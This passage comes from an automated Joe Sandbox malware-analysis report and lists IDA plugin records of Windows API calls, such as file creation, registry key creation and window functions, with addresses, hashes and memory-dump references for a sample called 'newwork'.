                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallbackDispatcherUser
                                                                                        • String ID:
                                                                                        • API String ID: 2492992576-0
                                                                                        • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                        • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                                                        • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                        • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00450804
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        • Opcode ID: ce99838f7be0491c6923214398908b2fd93372403a84c7b432a549debe4dc153
                                                                                        • Instruction ID: 52eb814c7c241dc182afdc6c3e242d4e4c9a4e6d94000e289351c80ae23ff87c
                                                                                        • Opcode Fuzzy Hash: ce99838f7be0491c6923214398908b2fd93372403a84c7b432a549debe4dc153
                                                                                        • Instruction Fuzzy Hash: 53E012B53541483EE780EEAD6C42F9777DC971A714F008037B998D7341D461DD158BA8
                                                                                        APIs
                                                                                        • GetFileAttributesA.KERNEL32(00000000,00000000,0042CD14,?,00000001,?,?,00000000,?,0042CD66,00000000,00452A25,00000000,00452A46,?,00000000), ref: 0042CCF7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: 2e3447488e8940f063bbcfc4a9008e9bc81ad59ac090e4e62a8f5aa92ecca264
                                                                                        • Instruction ID: d3c11148bbbe1678040d416a6bc301cfea82702c80b798926358c5e84281cc0e
                                                                                        • Opcode Fuzzy Hash: 2e3447488e8940f063bbcfc4a9008e9bc81ad59ac090e4e62a8f5aa92ecca264
                                                                                        • Instruction Fuzzy Hash: 80E065B1304304BFD701EB66EC92A5EBAACDB49754BA14876B50097592D5B86E008468
                                                                                        APIs
                                                                                        • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: FormatMessage
                                                                                        • String ID:
                                                                                        • API String ID: 1306739567-0
                                                                                        • Opcode ID: 07eb917982e44065cc90d67cadef310e262c4caec6bcfbb1197f6d5f5d2cfc19
                                                                                        • Instruction ID: fbc307da5c1359fbfbc351051067b699ae1438aedf6613c80dda169529e76e7e
                                                                                        • Opcode Fuzzy Hash: 07eb917982e44065cc90d67cadef310e262c4caec6bcfbb1197f6d5f5d2cfc19
                                                                                        • Instruction Fuzzy Hash: BCE0206278431116F2353416AC47B77150E43C0708F944027BB90DF3D3D6AF9945D25E
                                                                                        APIs
                                                                                        • GetTextExtentPointA.GDI32(?,00000000,00000000), ref: 0041AF9B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExtentPointText
                                                                                        • String ID:
                                                                                        • API String ID: 566491939-0
                                                                                        • Opcode ID: fe3873e992a20e622ffaf78f93863b288a9be0a8311253c2d6346deae250c6a6
                                                                                        • Instruction ID: 6b43be1268843882f9474f888990ee0a0f71ddbfb678ee1088bae751a0726d8f
                                                                                        • Opcode Fuzzy Hash: fe3873e992a20e622ffaf78f93863b288a9be0a8311253c2d6346deae250c6a6
                                                                                        • Instruction Fuzzy Hash: E3E086F13097102BD600E67E1DC19DB77DC8A483697148177F458E7392D62DDE1A43AE
                                                                                        APIs
                                                                                        • CreateWindowExA.USER32(00000000,0042367C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00406311
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateWindow
                                                                                        • String ID:
                                                                                        • API String ID: 716092398-0
                                                                                        • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                        • Instruction ID: 53e57476791a39574122dfc8a3f58f2f78c4a621b5a82e38d1c80b15216a1e52
                                                                                        • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                        • Instruction Fuzzy Hash: EEE0FEB2214209BBDB00DE8ADCC1DABB7ACFB4C654F808105BB1C972428275AC608B71
                                                                                        APIs
                                                                                        • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Create
                                                                                        • String ID:
                                                                                        • API String ID: 2289755597-0
                                                                                        • Opcode ID: 296f4a6b1841180fcb6525c1425398a2afe0618770c3240f8adf4a5c8222c494
                                                                                        • Instruction ID: 68673b5cf84413dff1d7ecec16939cb2303f89f305828e6cd22260af4b89741b
                                                                                        • Opcode Fuzzy Hash: 296f4a6b1841180fcb6525c1425398a2afe0618770c3240f8adf4a5c8222c494
                                                                                        • Instruction Fuzzy Hash: EDE07EB2610119AF9B40DE8CDC81EEB37ADAB1D350F404016FA08E7200C2B4EC519BB4
                                                                                        APIs
                                                                                        • FindClose.KERNEL32(00000000,000000FF,0047096C,00000000,00471782,?,00000000,004717CB,?,00000000,00471904,?,00000000,?,00000000), ref: 00454C0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseFind
                                                                                        • String ID:
                                                                                        • API String ID: 1863332320-0
                                                                                        • Opcode ID: 6665614e34a0f7cff573ca1669b2a109aa27f3c0ddffd1931b228eca5c2d9aab
                                                                                        • Instruction ID: 5c2dbd3a099336849a47a332199978da45cb785deb8a29a76394180ab3bc5383
                                                                                        • Opcode Fuzzy Hash: 6665614e34a0f7cff573ca1669b2a109aa27f3c0ddffd1931b228eca5c2d9aab
                                                                                        • Instruction Fuzzy Hash: A1E09BB09097004BC715DF39858031A76D19FC9325F05C96AEC99CF3D7E77D84454617
                                                                                        APIs
                                                                                        • KiUserCallbackDispatcher.NTDLL(004959E6,?,00495A08,?,?,00000000,004959E6,?,?), ref: 0041469B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallbackDispatcherUser
                                                                                        • String ID:
                                                                                        • API String ID: 2492992576-0
                                                                                        • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                        • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                                                        • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                        • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                                                                        APIs
                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F24
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3934441357-0
                                                                                        • Opcode ID: 4c02731fe18b0a47ab7745946c5e8dd4c7dfafdb2aa22804bebcbb41d9412fbb
                                                                                        • Instruction ID: adeaf4ebd0e6cd94d64be6b3cb299443ba394f13a0b1cd3d8337db6b6af80796
                                                                                        • Opcode Fuzzy Hash: 4c02731fe18b0a47ab7745946c5e8dd4c7dfafdb2aa22804bebcbb41d9412fbb
                                                                                        • Instruction Fuzzy Hash: 53D012722091506AD220965A6C44EAB6BDCCBC5770F11063AB558C2181D7209C01C675
                                                                                        APIs
                                                                                          • Part of subcall function 004235F8: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042360D
                                                                                        • ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                          • Part of subcall function 00423628: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423644
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoParametersSystem$ShowWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3202724764-0
                                                                                        • Opcode ID: 749b279e1c5e0ab7b3e77853442b745bf30ea7cb0c28c018a636783dda1148f2
                                                                                        • Instruction ID: 3e39ddd90fb628193caaea160b6f4ed5bf244f394cc2da11a07db6b12dca8b82
                                                                                        • Opcode Fuzzy Hash: 749b279e1c5e0ab7b3e77853442b745bf30ea7cb0c28c018a636783dda1148f2
                                                                                        • Instruction Fuzzy Hash: 34D05E123821703142307ABB280699B46EC8D822EB389043BB5449B312ED5DCE01116C
                                                                                        APIs
                                                                                        • SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: TextWindow
                                                                                        • String ID:
                                                                                        • API String ID: 530164218-0
                                                                                        • Opcode ID: 968e2600307bd84f4d65718215a4df57ccfa9b7919b98356d7a542cd4e907fd2
                                                                                        • Instruction ID: e359d8c046b4275bb87a72ac3440150ee0889cd0e7de0465f76ccf46c1161c2e
                                                                                        • Opcode Fuzzy Hash: 968e2600307bd84f4d65718215a4df57ccfa9b7919b98356d7a542cd4e907fd2
                                                                                        • Instruction Fuzzy Hash: 81D05EE27011602BCB01BAED54C4AC667CC9B8D25AB1840BBF904EF257D638CE40C398
                                                                                        APIs
                                                                                        • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467828,00000000,00000000,00000000,0000000C,00000000), ref: 00466B58
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallbackDispatcherUser
                                                                                        • String ID:
                                                                                        • API String ID: 2492992576-0
                                                                                        • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                        • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                                                        • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                        • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                                                        APIs
                                                                                        • GetFileAttributesA.KERNEL32(00000000,00000000,004515CB,00000000), ref: 0042CD2F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: 699a035a793c66476b33cfcb292e18e8433149420fa0246697406cd7a61acf8b
                                                                                        • Instruction ID: 53db4a1afaa3b7bebcc80daf879f764776582c58df104e6651e2d127eece83ed
                                                                                        • Opcode Fuzzy Hash: 699a035a793c66476b33cfcb292e18e8433149420fa0246697406cd7a61acf8b
                                                                                        • Instruction Fuzzy Hash: 48C08CE03222001A9E60A6BD2CC551F06CC891423A3A41E3BB129EB2E2D23D88162818
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A6D4,0040CC80,?,00000000,?), ref: 00406EDD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        • Opcode ID: d487f09bce5ab2446fefe52ff91139140134d323c8d44495a9ab4cbc0f9c4527
                                                                                        • Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
                                                                                        • Opcode Fuzzy Hash: d487f09bce5ab2446fefe52ff91139140134d323c8d44495a9ab4cbc0f9c4527
                                                                                        • Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
                                                                                        APIs
                                                                                        • SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                          • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,00497E2C,00000001,00000000,00000002,00000000,00497F8D,?,?,00000005,00000000,00497FC1), ref: 004506B7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLast
                                                                                        • String ID:
                                                                                        • API String ID: 734332943-0
                                                                                        • Opcode ID: dfd6122944db5b319254e7b77af95d7469dcf5406d44b15aeae4525e96e42585
                                                                                        • Instruction ID: 9573b676cf6dd5fef234c73c81a1a5d02d78d5ca05287b50762f3c98dcfac2da
                                                                                        • Opcode Fuzzy Hash: dfd6122944db5b319254e7b77af95d7469dcf5406d44b15aeae4525e96e42585
                                                                                        • Instruction Fuzzy Hash: 1AC04CA5700211479F10A6BA85C1A0662D86A5D3157144066BD08CF207D668D8148A18
                                                                                        APIs
                                                                                        • SetCurrentDirectoryA.KERNEL32(00000000,?,00497DBA,00000000,00497F8D,?,?,00000005,00000000,00497FC1,?,?,00000000), ref: 004072B3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectory
                                                                                        • String ID:
                                                                                        • API String ID: 1611563598-0
                                                                                        • Opcode ID: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
                                                                                        • Instruction ID: 2ee9fcf0c2ecb8048618371478a38130c752a95b947e2a8aefd026f579ab26ad
                                                                                        • Opcode Fuzzy Hash: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
                                                                                        • Instruction Fuzzy Hash: 33B012E03D120A2BCA0079FE4CC192A00CC46292163401B3B3006EB1C3D83DC8180824
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(?,0042E40D), ref: 0042E400
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode
                                                                                        • String ID:
                                                                                        • API String ID: 2340568224-0
                                                                                        • Opcode ID: cb8e2ebd86b0ac1182f6c4657d989dfa6a466ad308997f4b3834ff3b1e7758f7
                                                                                        • Instruction ID: 426ac138898b17598b25982f2c454791bd479401c65f9a69ae9baa170422678e
                                                                                        • Opcode Fuzzy Hash: cb8e2ebd86b0ac1182f6c4657d989dfa6a466ad308997f4b3834ff3b1e7758f7
                                                                                        • Instruction Fuzzy Hash: CDB09B7670C6105EE709D6D5B45552D63D4D7C57207E14477F010D2581D57D58054E18
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: DestroyWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3375834691-0
